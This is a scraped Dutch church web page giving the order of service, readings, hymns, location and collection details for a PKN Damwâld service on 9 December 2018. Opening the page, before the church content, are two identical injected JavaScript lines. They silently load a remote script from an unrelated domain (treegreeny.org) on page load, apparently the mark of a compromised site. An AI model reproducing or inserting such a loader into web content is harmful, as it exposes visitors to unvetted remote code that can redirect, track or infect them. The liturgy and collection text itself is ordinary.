;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 december 2018 14:00 uur - PKN Damwâld
zondag 9 december 2018
14:00 uur

Kerkdienst zondag 9 december 2018 14:00 uur

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Liturgie
lied voor de dienst ELB 99:1,5,7
Intochtslied Ps.74:1,2,5,7
Stil gebed ,Votum en groet
Inleiding op de dienst:
Een preek, een gesprek en een tekst
Gebed
We lezen: Luk.21:5-19, 25-28
We zingen: Gez.120:1,4
Preek .
We zingen: Gez.127:2,3
We lezen: Jes.26:7-12 en uitleg
We zingen: Ps.116:2,5,7
Lezing van de Geloofsbelijdenis
We zingen: Gez.118:1,2
Dankgebed en voorbeden
Collecte
We zingen: Ps.27:7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Collecte Pastoraat - Pastoraat nieuwe stijl

In steeds meer plattelandsgemeenten is de afgelopen jaren het aantal predikanten teruggebracht. Gemeenteleden zijn in toenemende mate voor het onderling pastoraat op elkaar aangewezen. De Protestantse Kerk werkt met plaatselijke gemeenten samen aan laagdrempelige vormen voor onderlinge zorg en pastoraat. Ervaringen worden gebundeld en beschikbaar gesteld voor andere gemeenten. Daarnaast worden hiervoor trainingen georganiseerd, zoals "Nieuwe wegen in het pastoraat". Ook voor beginners in een pastorale taak en voor degenen die zich in een bepaald aspect van pastoraat verder willen verdiepen zijn er trainingen. Nieuwe kennis en vaardigheden maken het mogelijk om bij te blijven in een veranderende samenleving en kerk

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds